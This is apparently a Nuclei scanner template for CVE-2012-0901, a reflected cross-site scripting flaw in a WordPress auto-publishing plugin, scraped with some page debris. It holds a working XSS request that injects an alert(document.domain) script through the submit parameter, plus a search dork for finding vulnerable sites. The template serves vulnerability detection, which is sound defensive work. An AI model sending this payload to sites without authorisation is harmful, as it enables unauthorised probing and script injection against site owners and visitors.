43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
|
id: CVE-2012-0901
|
||
|
|
||
|
info:
|
||
|
name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-0901
|
||
|
- http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt
|
||
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72271
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||
|
cve-id: CVE-2012-0901
|
||
|
cwe-id: CWE-79
|
||
|
cvss-score: 4.3
|
||
|
metadata:
|
||
|
google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
|
||
|
tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "</script><script>alert(document.domain)</script>"
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/02/21
|